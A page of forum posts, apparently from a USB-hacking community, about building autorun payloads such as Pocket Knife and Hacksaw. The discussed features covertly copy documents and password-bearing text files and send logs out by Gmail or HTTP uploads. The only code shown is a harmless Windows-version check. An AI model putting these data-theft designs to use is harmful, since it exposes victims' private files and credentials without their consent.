DMilton
-
Posts
132 -
Joined
-
Last visited
Posts posted by DMilton
-
-
I have one exam left tomorrow, a little partying on the weekend then I'll see what I can do.
Good luck with your exam... I remember it... So many years ago...
-
this project is freezing someones gotta release VER 9 gerr
In fact, I'm waiting for version 9 for something else developing, but without Leapo... we can continue developing this stuff. The first we have to do is reading the forum, there are very interesting things we can add to the payload as the MySQL+PHP way of sending the logs (not only this). Moreover, some of us can contribute with new ideas but a working group is needed and a base in what to develop is needed too.
Where's Leapo?
If he wants to continue his work as he told a pair of weeks ago, I'll be glad of contributing in the few I could, if he doesn't... will wait!
-
Hey man cool work, i just had a brain wave, Okay to be honest we are not going to do a 3 second configure when we are about to attack a computer. We are going to set up the payload the day/night before using a comp which more than likely we have .Net Framework installed.
(no attack intended @DMilton)
Don't worry man, I don't feel attacked at all. Only one observation... Figure you have to plan your attack in 3 seconds. One situation, one solution!
I don't want to annoy alexthedrifter at all, in fact his work desserves applause, but if this is your situation (probably if I answered it is because is mine), you have to act as soon as possible, as fast as possible, and problably you haven't time to install .NET at all (if it is possible). :(
Anyway, good work!
-
Well, I'm developing my own payload because pocket knife doesn't work like it should, I was discussing it inside that thread.
The OS recognition fails if the Windows is not English, that's why I was thinking about finding "(x86)" at the program files path, although I'm not sure if it's universally named with (x86) at any language.
Sorry, I posted you to the incorrect link...
For any language system, you can do this
For all languages OS detection, If you modify:ver|find "[Version 5.00." if errorlevel 1 goto SetOSwin2k ver|find "[Version 5.1." if errorlevel 1 goto SetOSXP32 ver|find "[Version 5.2." if errorlevel 1 goto SetOSXP64 ver|find "[Version 6.0." if errorlevel 1 goto SetOSVISTA32 ver|find "[Version 6.???" if errorlevel 1 goto SetOSVISTA64 :SetOSDefault goto SetOSXP32 :SetOSwin2k SET CurrentOS=win2k GOTO EndDetect :SetOSXP32 SET CurrentOS=XP32 GOTO EndDetect :SetOSXP64 SET CurrentOS=XP64 GOTO EndDetect :SetOSVISTA32 SET CurrentOS=VISTA32 GOTO EndDetect :SetOSVISTA64 SET CurrentOS=VISTA64 GOTO EndDetect :EndDetect
The code will not work for spanish systems (or other I supose), because the ver command shows lines as "VersiĆ³n 5.00....". You can modify the code with:
ver|find "5.00." if errorlevel 1 goto SetOSwin2k ver|find "5.1." if errorlevel 1 goto SetOSXP32 ver|find "5.2." if errorlevel 1 goto SetOSXP64 ver|find "6.0." if errorlevel 1 goto SetOSVISTA32 ver|find "6.???" if errorlevel 1 goto SetOSVISTA64 :SetOSDefault goto SetOSXP32 :SetOSwin2k SET CurrentOS=win2k GOTO EndDetect :SetOSXP32 SET CurrentOS=XP32 GOTO EndDetect :SetOSXP64 SET CurrentOS=XP64 GOTO EndDetect :SetOSVISTA32 SET CurrentOS=VISTA32 GOTO EndDetect :SetOSVISTA64 SET CurrentOS=VISTA64 GOTO EndDetect :EndDetect
It will work for all languages OS's. ;)
posted Here!
-
Is it possible to autorun when a machine is locked by an admin?
It's so easy as trying it... If you are looking for an answer as this, I think the best is trying by yourself... isn't it? ;)
-
btw, can anyon eprovide a t on how to put tis into our payload?
This can be easyly implemented into everyone's payload but if the idea is doing it into the Leapo's Pocket Knife it will be very easy, of course.
Maybe Leapo will do it or if he wants, I'll write (with Tcstool permission ;)) the code to run from Leapo's Pocket Knife for his next release!
The only you have to do is to add the apps to the SYSTEM folder and modify the
>> %1\output\...
to the Leapo's output log file.
But in this stuff I think that there is some things as MD5SUM or exporting the entire Registry in Leapo's will not be very useful (not as in other payloads oriented to security audits)
Leapo: What about it?
-
A fast work implementing the idea from HarshReality and a good work it all. Now we can add this to our payloads (yeepeyaaaaa!!!!)
So... look, you're pinned!
-
Great work! I will update my own payload by now...
And... Will you add this stuff to the wiki?
-
I'm having problems installing Hacksaw on my usb U3 drive, and i need all the help i can get as this is kind of important.
I'm new to this and i have no idea what i'm doing wrong, and am kind of annoyed at trying to make it work and getting nowhere :P
So, here's what i am doing:
1. download hacksaw from http://www.usbhacks.com/2006/10/07/usb-hacksaw/
2. unzip the file to my desktop
3. insert my U3 drive
4. follow the readme.txt
4i. run the LP starter, all goes ok
4ii. now here is where i'm having problems. in the readme file it says you have to edit the send.bat file to put in the gmail address and move it to the root of your flash drive. Problem is i open the payload\WIP\SBS file and all the files are hidden and i can't edit it. (i tried everything to unhide the files but failed)
Anyone can help me out? maybe take me through all the steps and all that, i'd appreciate it a lot :)
-raffi
The only you have to do is to allow system seeing the hidden files (Go to "My PC", "Folder Options", here you have to allow seeing hidden files and folders...
How about trying it with SOL(Send Outgoing Log) instead of that gmail crap!do you really want to expose your gmail password? If your going to use a skiddie tool, count on being found out. At least if you use something that doesn't reveal passwords... (like SOL) At least you wont get pwned ;)
The idea is to pwn without being pwned yourself! Its like saying here's my gmail password just sitting in a unencrypted plain text file! Come and get it ! lol
Truely no one wants to be his gmail account password to be exposed but as ravc told us... He's new to this and your SOL solution (MySQL+PHP) way is much better but not implemented in any payload yet as Leapo's or GonZor's (by example) not as your's or mine or people whith some basic level in this matherials...
-
Well usually people beat me to the punch so I don't post. I also forgot about the forums lol.
And good point about the security guru/ebay problem. the reason I brought the idea up is so that someone like you would recognize the dangerous potential this could lead to and outcome of it. I hope this warns readers out there that they should not attempt this in anyway!
What a dirty job is this?
I think no one is so...fool? to do it, e-baying or selling them in a marketplace... But the idea is planning over my own fried mind! 
As you do, I hope "this" warns readers out there of doing nonsenses as this...
-
Good job Tcstool! I think it would be great to add this at the wiki... You're not responsible if the final user is using it in a white hat way or not, but I found it useful.
As HarshReality said a list of installed printers and properties from them will be very useful too.
-
Hey, I have (another) question, and also an idea.
The question...when I put the flash drive in computers with Windows 2000, 9 times out of 10 a message will pop up saying there's some sort of error with "wscript.exe," and it says to "please ensure that a floppy is drive A:." Now, this may be a problem due to the fact that these are being used on computers which previously had floppy drives, but were removed and disabled in the BIOS. Not sure why PocketKnife would cause an error having anything to do with floppies though, and I do not know what "wscript.exe" specifically means. This isn't a very big problem, since the payload still runs fine, just...I have to exit the error every time I put it in one of their computers, except for like 1 or 2 computers.
The solution is modifying the GO.VBS. In this thread is the solution by mencargo...
Second, the suggestion. The slurp application info is a very nice idea. I know it can take time, but slurping little bits and pieces of info like that is just helpful. However, what would make it even better is if it would also capture Notepad and possibly Word files that don't have much text in them. People often put passwords or private pieces of information in Notepad files. So, maybe it should capture all Notepad files that have, say, fewer than 40 words in them, or X amount of characters, or whatever.I'm not sure if this would be hard to code, and also, I'm thinking that if it has to search the whole computer for them it may take a long time to run, so maybe it could just search the Desktop and Documents folders.
In my case, I don't think i'll use this way of slurping but if it can be useful for more people, I could try to script it it... Anybody?
In any case, probably the consumption of time would do the slurping action not to be very efficient. Probably it will be better to slurp all the .txt, .doc, .rtf files...
-
You don't have to remove gonzor. The only you have to do is installing new version in the same way you installed previous one. It will replace the version with the new one.
-
Good work. I will donwnoad AutoIT to compile the modules and see how it works... Thanks!
-
Hi there, I'm searching for a way to detect if the host OS is 64bit or 32bit.
Is there any enviroment varable for this? (Available from ms-dos)
Or any way to detect it with a vbs script?
I was thinking something like:
ver|find /c "X.X."
or
echo %programfiles%|find /c "(x86)"
And, just curiosity, why do some usb payloads use "%windir%\system32\find.exe"?
Isn't find available as default everywhere?
Try this. It was implemented into Leapo's Pocket Knife and it works. ;)
-
Slurp3? I didn't know one existed xD. The framework requirement is by default in VB 2008 Express; any idea on how to edit this it would be thanked.
No, I'm sorry... I don't know how do do for not using .NET Framework.
Slurp3 method (I named it slurp3 because slurp1 and slurp2 already exists) is a way of slurping only desired files from My Documents, Desktop, Shared Documents and Shared Desktop (similar as Slurp2 but more oriented attack), it can substitute it too. It's not implemented yet but i'll think Leapo's will do. It uses a plain text file (wanted.txt from \SYSTEM dir), editable for slurping files by extension (*.jpg, *.doc, etc). It can slurp all files too (by edditing the wanted.txt and adding the *.* for it). You can find more information into the Pocketnife Payload thread here
-
You probably haven't seen it since its on the low on the second page now.
http://hak5.org/forums/index.php?showtopic=9644
Its almost guaranteed that port 80 is open, and its the most undetectable method. Therefore I think it's the best way
Have you think about adding this to the wiki and may be a brief "How to"? I found this thread a few days ago and found it really useful (voted PHP+HTTP+SQL). I know it's the same it does some backdoors too, but the benefits in this stuff are really great.
What would happen if the connection is not active or if it's interrupted when a log (or slurped files) are being uploading?
Note: I don't know if I have posted in the correct place... Maybe I would have done it in the other thread...
-
And finally, I'd just like to speak up about the method of payload development that's been going on in this thread. It is very, very confusing that multiple people are making multiple updates to Leapo's payload. A GUI, bug fixes, etc. It's impossible for anyone to keep up.
First of all, if we wanted to develop an independent payload, we surely would do. I have my own payload, of course, as many of us have. But the final purpose of posting in this Pocket Knife Thread is precisely allowing Leapo in developing his payload. This stuff doesn't belong to Leapo, but the entire community.
But if Leapo did the effort to compile in a batch a compendium of other scripts, and tryed to improve them is because, probabily he had an altruistic thought.
The reason of posting is, precisely, helping in developing his first (and now very evolved) code. Without the collaboration of many people (I would not nominate anyone for not forgetting anyone), he probabily would have left this proyect.
But don't forget that if you, me (or someone else) post a code trying to update the code is, surelly, because we want to collaborate and, of course, making readers understand the code and share knowledge.
But the last one that has to update his code is Leapo. By the way, we only can try to help.
In fact, I personally believe having independent payloads in general is bad. Leapo had the right idea; a payload with just about everything. People have been working with Leapo on this payload to make it a fusion of the best ideas and features, and that's been working, but I understand that he's been inactive for a while and people are taking it upon themselves to edit it and add/edit things to make it better. I know that he hasn't been on in a while, but I feel that things would be simpler and better for everyone if they simply collaborated with Leapo and worked on it with him, so there's only one version of Leapo's payload. Unless he does not plan on updating it any time in the next 2 months, or has quit, then people should just be working with him.In fact me too, but as you see, if someone wants to make a independent payload, he does it in a independent thread... If you refer to someone that are developing a GUI, surely, if Leapo sees that, will contact him/them (and vice-versa) to work hand in hand. If the author of a GUI, show us (by publishing the code) how he did it, surely, it'll be usefull, because it's one more less thing to do (or one more thing to improve!
) Those who doesn't want to be "one more" but "The One", haven't no place in this forum...Finally, I don't know if he is planning on updating the payload, probably yes (he told it a few days ago), but also probably he has other things to do (as many of us). In second place, there's many things to do, many improvements to implement and many others to investigate. Then, let Leapo decide if he wants to do it, and let others to decide if we want to use his code (as me), helping him in it's developing and others in understanding of how it works. I remember GonZor did the same far, far time ago (sigh!), and the response to him was the same as for Leapo, in fact I remember many people helping in Gonzor's stuff (will not say names).
As far as I know, Leapo always appreciated contributions, then be sure, when he can read the post, recompile, compile and rebuild his code, he'll do it. Otherwise, I'm sure he'll pass the baton...
Meanwhile, I will be waiting for his answers and learning more things (There's some very good threads here and in other communities), and the developing of this kind of stuf will surely be alive, with of without Leapo (better with).
Every body knows that Leapo begun this Thread and did the first re-compilation, re-compilated from other re-compilations, searching for code from other anonymous people (and not anonymous ones), and those from others... till the beginnings of the times... :P There's no new in doing so, but is a work in doing it.
Can you contribute? Perfect, do it...
We still be waiting for next release, with or without GUI... (Better with)
-
I'll be testing it in this week...
First question, why we must use .NET Framework? Sorry if this question is so simply but I think, if we want to run it in a computer without .NET Framework, we must install it. What it happens if we have only a pair of seconds to configure the payload?
I don't want to compromise you but you surely will understand what I'm trying to say...
I'll be waiting for the sourcecode as DingleBerries too.
Haven't you implemented the Slurp3 code?
Have you worked in a clean installation of the Pocket Knife or a updated one?
By the way, only one more thing to say GREAT WORK!
-
Is there a way to flash the u3 partition without backing up and restoring the drive?
See what DingleBerries are doing... http://hak5.org/forums/index.php?showuser=9434 I think is the perfect solution, isn't it
-
anyone wanna give me a update on what happened last 3 days? TOo much stuff to read please
Some of the readers, have decided to create a GUI for Windows, non MS-DOS GUI (Elmer, alexthedrifter and mencargo).
Some others we are interested in it, helping with what we can.In fact, alexthedrifter has released an ALPHA-BETA :P version GUI (Look for new posts).
Some new implementations for the Payload (Slurp3 proof of concept).
Some issues with the Payload Verye had with the auto-run and how Windows manage file extensions where solved.
That's all
-
Hey peeps
Well I bought myself a cruzer titanium pen drive to mostly store documents on, however I decided to password protect it and have come back to my desk to realise I have totally forgotten the password :(
Just wondering if anyone knowns a method of getting into these before I an hero, as I just wrote & saved a word document within it.
Cheers
Probably, you must do it, formatting again the pen drive...
-
I have seen it, it's a GUI.
My concept of what you must see when you open the GUI is seeing a list of checked/unchecked boxes to activate or not a stuff. If you use only buttons, you cannot know the state of each sub-payload.
But by the momment, till he implements more things, it looks alexthedrifter is doing a good work. ;)
Yes, yes, yes, yes, I know, it's a BETA...
-
Well, I'm saying the flaw is that auto-play was disabled by default. Meaning, the person would be immune from attacks without even knowing what auto-play WAS.
Also, what's with that GO.vbs error I kept getting?
With the GO.vbs file, don't worry, it's a known error probably caused by a non well assigned variable in the vbs file (fixed a few posts before), problems are not persecuting you...
[user]mencargo[/user] posted a solution for it here. Probably it will be fixed by Leapo on next release.
Gonzor Payload - What is the VNC Password?
in USB Hacks
Posted
Maybe "yougothacked"...?
Refer to This topic